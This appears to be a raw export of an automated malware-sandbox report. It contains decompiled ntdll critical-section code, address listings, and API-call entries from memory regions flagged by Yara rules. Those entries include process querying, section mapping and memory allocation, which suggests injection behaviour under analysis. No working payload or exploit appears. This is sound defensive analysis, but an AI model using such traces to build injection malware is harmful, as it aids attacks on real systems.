                                                                                                                                                                                                              						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                                                              						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                                                              						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                                                              							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                                                              							_v66 = 0x1722;
                                                                                                                                                                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                              							_t76 =  &_v72;
                                                                                                                                                                                                              							_push( &_v72);
                                                                                                                                                                                                              							_v28 = _t85;
                                                                                                                                                                                                              							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                                              							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                              							_push(0x20402);
                                                                                                                                                                                                              							E00BE01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							_t43 = _v8;
                                                                                                                                                                                                              							_push(_t80);
                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                              							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                                              							if(_t43 == 0xffffffff) {
                                                                                                                                                                                                              								_t71 =  *0xcc793c; // 0x0
                                                                                                                                                                                                              								_push(_t85);
                                                                                                                                                                                                              								_t44 = E00BE1F28(_t71);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t44 = E00BDF8CC(_t43);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _t44 - 0x102;
                                                                                                                                                                                                              							if(_t44 != 0x102) {
                                                                                                                                                                                                              								__eflags = _t44;
                                                                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                                                                              									_push(_t44);
                                                                                                                                                                                                              									E00C23915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                                                              									asm("int3");
                                                                                                                                                                                                              									E00C62306(_t85);
                                                                                                                                                                                                              									__eflags = _t67 & 0x00000002;
                                                                                                                                                                                                              									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                                                              										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                                                              										_t72 = _t7;
                                                                                                                                                                                                              										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                                                              										__eflags = _t67 - _t67;
                                                                                                                                                                                                              										if(_t67 == _t67) {
                                                                                                                                                                                                              											E00C0EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									return 0;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									__eflags = _v24;
                                                                                                                                                                                                              									if(_v24 != 0) {
                                                                                                                                                                                                              										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									return 2;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L36;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                                                              							_push(_t67);
                                                                                                                                                                                                              							_t46 = E00C24FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                                                              							_push(_t77);
                                                                                                                                                                                                              							E00C33F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                                                              							_t48 =  *_t85;
                                                                                                                                                                                                              							_t92 = _t91 + 0x18;
                                                                                                                                                                                                              							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                              							if(_t48 == 0xffffffff) {
                                                                                                                                                                                                              								_t49 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                              							_push(_t49);
                                                                                                                                                                                                              							_t50 = _v12;
                                                                                                                                                                                                              							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                                                              							_push(_t85);
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                                                              							E00C33F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                                                              							_t53 =  *_t85;
                                                                                                                                                                                                              							_t93 = _t92 + 0x20;
                                                                                                                                                                                                              							_t67 = _t67 + 1;
                                                                                                                                                                                                              							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                              							if(_t53 != 0xffffffff) {
                                                                                                                                                                                                              								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                              								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _t67 - 2;
                                                                                                                                                                                                              							if(_t67 > 2) {
                                                                                                                                                                                                              								__eflags = _t85 - 0xcc20c0;
                                                                                                                                                                                                              								if(_t85 != 0xcc20c0) {
                                                                                                                                                                                                              									_t76 = _a4;
                                                                                                                                                                                                              									__eflags = _a4 - _a8;
                                                                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                                                                              										E00C6217A(_t71, __eflags, _t85);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                              							_push(0x65);
                                                                                                                                                                                                              							_a8 = _a4;
                                                                                                                                                                                                              							E00C33F92();
                                                                                                                                                                                                              							_t91 = _t93 + 0xc;
                                                                                                                                                                                                              							__eflags =  *0x7ffe0382;
                                                                                                                                                                                                              							if( *0x7ffe0382 != 0) {
                                                                                                                                                                                                              								goto L21;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					return _t40;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L36:
                                                                                                                                                                                                              			}

































                                                                                                                                                                                                              0x00c0ec56
                                                                                                                                                                                                              0x00c0ec56
                                                                                                                                                                                                              0x00c0ec56
                                                                                                                                                                                                              0x00c0ec5c
                                                                                                                                                                                                              0x00c0ec64
                                                                                                                                                                                                              0x00c423e6
                                                                                                                                                                                                              0x00c423eb
                                                                                                                                                                                                              0x00c423eb
                                                                                                                                                                                                              0x00c0ec6a
                                                                                                                                                                                                              0x00c0ec6c
                                                                                                                                                                                                              0x00c0ec6f
                                                                                                                                                                                                              0x00c423f3
                                                                                                                                                                                                              0x00c423f8
                                                                                                                                                                                                              0x00c423fa
                                                                                                                                                                                                              0x00c423fc
                                                                                                                                                                                                              0x00c0ec75
                                                                                                                                                                                                              0x00c0ec76
                                                                                                                                                                                                              0x00c0ec76
                                                                                                                                                                                                              0x00c0ec7b
                                                                                                                                                                                                              0x00c0ec7c
                                                                                                                                                                                                              0x00c0ec7e
                                                                                                                                                                                                              0x00c42406
                                                                                                                                                                                                              0x00c42407
                                                                                                                                                                                                              0x00c4240c
                                                                                                                                                                                                              0x00c4240d
                                                                                                                                                                                                              0x00c4240d
                                                                                                                                                                                                              0x00c4240d
                                                                                                                                                                                                              0x00c42414
                                                                                                                                                                                                              0x00c42417
                                                                                                                                                                                                              0x00c4241e
                                                                                                                                                                                                              0x00c42435
                                                                                                                                                                                                              0x00c42438
                                                                                                                                                                                                              0x00c4243c
                                                                                                                                                                                                              0x00c4243f
                                                                                                                                                                                                              0x00c42442
                                                                                                                                                                                                              0x00c42443
                                                                                                                                                                                                              0x00c42446
                                                                                                                                                                                                              0x00c42449
                                                                                                                                                                                                              0x00c42453
                                                                                                                                                                                                              0x00c42455
                                                                                                                                                                                                              0x00c4245b
                                                                                                                                                                                                              0x00c4245b
                                                                                                                                                                                                              0x00c0eb99
                                                                                                                                                                                                              0x00c0eb99
                                                                                                                                                                                                              0x00c0eb9c
                                                                                                                                                                                                              0x00c0eb9d
                                                                                                                                                                                                              0x00c0eb9f
                                                                                                                                                                                                              0x00c0eba2
                                                                                                                                                                                                              0x00c42465
                                                                                                                                                                                                              0x00c4246b
                                                                                                                                                                                                              0x00c4246d
                                                                                                                                                                                                              0x00c0eba8
                                                                                                                                                                                                              0x00c0eba9
                                                                                                                                                                                                              0x00c0eba9
                                                                                                                                                                                                              0x00c0ebae
                                                                                                                                                                                                              0x00c0ebb3
                                                                                                                                                                                                              0x00c0ebb9
                                                                                                                                                                                                              0x00c0ebbb
                                                                                                                                                                                                              0x00c42513
                                                                                                                                                                                                              0x00c42514
                                                                                                                                                                                                              0x00c42519
                                                                                                                                                                                                              0x00c4251b
                                                                                                                                                                                                              0x00c0ec2a
                                                                                                                                                                                                              0x00c0ec2d
                                                                                                                                                                                                              0x00c0ec33
                                                                                                                                                                                                              0x00c0ec36
                                                                                                                                                                                                              0x00c0ec3a
                                                                                                                                                                                                              0x00c0ec3e
                                                                                                                                                                                                              0x00c0ec40
                                                                                                                                                                                                              0x00c0ec47
                                                                                                                                                                                                              0x00c0ec47
                                                                                                                                                                                                              0x00c0ec40
                                                                                                                                                                                                              0x00be22c6
                                                                                                                                                                                                              0x00c0ebc1
                                                                                                                                                                                                              0x00c0ebc1
                                                                                                                                                                                                              0x00c0ebc5
                                                                                                                                                                                                              0x00c0ec9a
                                                                                                                                                                                                              0x00c0ec9a
                                                                                                                                                                                                              0x00c0ebd6
                                                                                                                                                                                                              0x00c0ebd6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c0ebbb
                                                                                                                                                                                                              0x00c42477
                                                                                                                                                                                                              0x00c4247c
                                                                                                                                                                                                              0x00c42486
                                                                                                                                                                                                              0x00c4248b
                                                                                                                                                                                                              0x00c42496
                                                                                                                                                                                                              0x00c4249b
                                                                                                                                                                                                              0x00c4249d
                                                                                                                                                                                                              0x00c424a0
                                                                                                                                                                                                              0x00c424a3
                                                                                                                                                                                                              0x00c424aa
                                                                                                                                                                                                              0x00c424aa
                                                                                                                                                                                                              0x00c424a5
                                                                                                                                                                                                              0x00c424a5
                                                                                                                                                                                                              0x00c424a5
                                                                                                                                                                                                              0x00c424ac
                                                                                                                                                                                                              0x00c424af
                                                                                                                                                                                                              0x00c424b0
                                                                                                                                                                                                              0x00c424b3
                                                                                                                                                                                                              0x00c424b9
                                                                                                                                                                                                              0x00c424ba
                                                                                                                                                                                                              0x00c424bb
                                                                                                                                                                                                              0x00c424c6
                                                                                                                                                                                                              0x00c424cb
                                                                                                                                                                                                              0x00c424cd
                                                                                                                                                                                                              0x00c424d0
                                                                                                                                                                                                              0x00c424d1
                                                                                                                                                                                                              0x00c424d4
                                                                                                                                                                                                              0x00c424d6
                                                                                                                                                                                                              0x00c424d9
                                                                                                                                                                                                              0x00c424d9
                                                                                                                                                                                                              0x00c424dc
                                                                                                                                                                                                              0x00c424df
                                                                                                                                                                                                              0x00c424e1
                                                                                                                                                                                                              0x00c424e7
                                                                                                                                                                                                              0x00c424e9
                                                                                                                                                                                                              0x00c424ec
                                                                                                                                                                                                              0x00c424ef
                                                                                                                                                                                                              0x00c424f2
                                                                                                                                                                                                              0x00c424f2
                                                                                                                                                                                                              0x00c424ef
                                                                                                                                                                                                              0x00c424e7
                                                                                                                                                                                                              0x00c424fa
                                                                                                                                                                                                              0x00c424ff
                                                                                                                                                                                                              0x00c42501
                                                                                                                                                                                                              0x00c42503
                                                                                                                                                                                                              0x00c42506
                                                                                                                                                                                                              0x00c4250b
                                                                                                                                                                                                              0x00c0eb8c
                                                                                                                                                                                                              0x00c0eb93
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c0eb93
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c0eb99
                                                                                                                                                                                                              0x00c0ec85
                                                                                                                                                                                                              0x00c0ec85
                                                                                                                                                                                                              0x00c0ec85
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00C4248D
                                                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 00C424FA
                                                                                                                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00C424BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                                              • API String ID: 0-3177188983
                                                                                                                                                                                                              • Opcode ID: f3ff3dbe483124e76c1ec5180192f5ac080cede999445002d6be749882e8e56d
                                                                                                                                                                                                              • Instruction ID: 50814134153ba635af0b7599e9afe59d755894fe2aa83fb5ff3f570edd75dc8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3ff3dbe483124e76c1ec5180192f5ac080cede999445002d6be749882e8e56d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1041F670A00204ABD720DFA9CC86F6A77F8FF84320F208A45F5659B2D1D734EA41DB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fassign
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                              • Instruction ID: 579df895aa728f0c47bdc9eb223afdf319bc4c7a98a6d784f52fff901adbeeee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58916171E00209EFDF24DF99C8456EEB7B4FF56304F24807AD411A6152E7309B96EB91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00C1FED6: ___swprintf_l.LIBCMT ref: 00C1FEFD
                                                                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 00C4EA87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                                                              • String ID: :%u$d}w
                                                                                                                                                                                                              • API String ID: 48624451-1861874425
                                                                                                                                                                                                              • Opcode ID: 8a259df833b4d78d3e977514b3bc72f282d62a089d5e700d1c6aa72a0de4ebb4
                                                                                                                                                                                                              • Instruction ID: c88be3e8237cbdcd375506db6854cb3bc7b546dd218fd1993cb3ae35056fe3f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a259df833b4d78d3e977514b3bc72f282d62a089d5e700d1c6aa72a0de4ebb4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C311B172500229EBCB10EEA5CC509EFB7ACFF55700B50452AF855D3152EB70EA45ABE0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 0078691F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380496854.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 1778838933-4108050209
                                                                                                                                                                                                              • Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                                                                                                                                                                              • Instruction ID: b3d4afcd34b0960af5487ab94258bbd2712ce181192a8b2bef4b4678e98aabae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F13170958A4C8FDBA9EF68C899AEEB7F0FB98304F50462AE44AC7251DF349541CB41
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380496854.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Section$CloseCreateView
                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                              • API String ID: 1133238012-149943524
                                                                                                                                                                                                              • Opcode ID: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                                                                                                                                                                                              • Instruction ID: 2eb717b89ae743e744ce4532866e822a6022cf2a480d630cd7eeedc9197d02fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B61907061CB488FCB58EF68D8856AEBBE0FB98314F50062EE58AC3651DF35D441CB86
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380496854.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Section$CreateView
                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                              • API String ID: 1585966358-149943524
                                                                                                                                                                                                              • Opcode ID: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                                                                                                                                                                                              • Instruction ID: e52e862e7ce72ef64445c89e1d8b33eb76784cd0d7501cc8f3d6c7841779803a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2516D7061CB088FC758EF18D8956AABBE0FB98314F50062EF58AD3651DF35D581CB86
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 0078691F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380496854.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 1778838933-4108050209
                                                                                                                                                                                                              • Opcode ID: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                                                                                                                                                                                              • Instruction ID: 1a487f63b6629cb3dccd2f79b16711e3d81d093dd3a383c7297157f5f637f74d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A515D70958A8C8FDB69EF68C8946EEB7F4FB98304F40422EE44AD7211DF349641CB41
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009821D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID: .z`
                                                                                                                                                                                                              • API String ID: 823142352-1441809116
                                                                                                                                                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                              • Instruction ID: 54f66134d72e5895203a74e1597a4b849c5be85c1124d214ac3a1456a0e4f0c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F0B2B2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000982C5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: !:
                                                                                                                                                                                                              • API String ID: 2738559852-2595984152
                                                                                                                                                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                              • Instruction ID: e8a0500a2ac4b7a84fe9f6416392c8ffd6bfa165503efab50eac44a2dfd3a6b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E811CBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000982C5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: !:
                                                                                                                                                                                                              • API String ID: 2738559852-2595984152
                                                                                                                                                                                                              • Opcode ID: b629a921f7fa863b1d84fa3e80be44a9cb783a898edeab49144b8ed01006ebfd
                                                                                                                                                                                                              • Instruction ID: 4c48b8a3907d123b41ab061b6e6ab09016d62c84ad3ea64e3f5986801239f1fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b629a921f7fa863b1d84fa3e80be44a9cb783a898edeab49144b8ed01006ebfd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F0D4B6200048ABCB08DF98D890CEB77ADAF8C214B158689FE5C97202C630E855CBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098325
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close
                                                                                                                                                                                                              • String ID: @=
                                                                                                                                                                                                              • API String ID: 3535843008-2632950984
                                                                                                                                                                                                              • Opcode ID: 107b36d1b289daf857d05bb15f724ec5085fe4c9239f3c28d7d5a12e726c208a
                                                                                                                                                                                                              • Instruction ID: 99d198683f306a905671b41eba33099325e77ea6f400be5cc8d6fc0956a93453
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 107b36d1b289daf857d05bb15f724ec5085fe4c9239f3c28d7d5a12e726c208a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BE01276640214BBEB14DF94CC45EEB7B68EF84760F154499FA589B692CA31EA00C7E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098325
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close
                                                                                                                                                                                                              • String ID: @=
                                                                                                                                                                                                              • API String ID: 3535843008-2632950984
                                                                                                                                                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                              • Instruction ID: d3195b798101d0e5feaa660c62fabe49bed0d5a9fb5cae54d3c1cf7ac1affaff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AD012752002146BD710EF98CC45ED7775CEF44750F154455BA189B282C570F90087E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
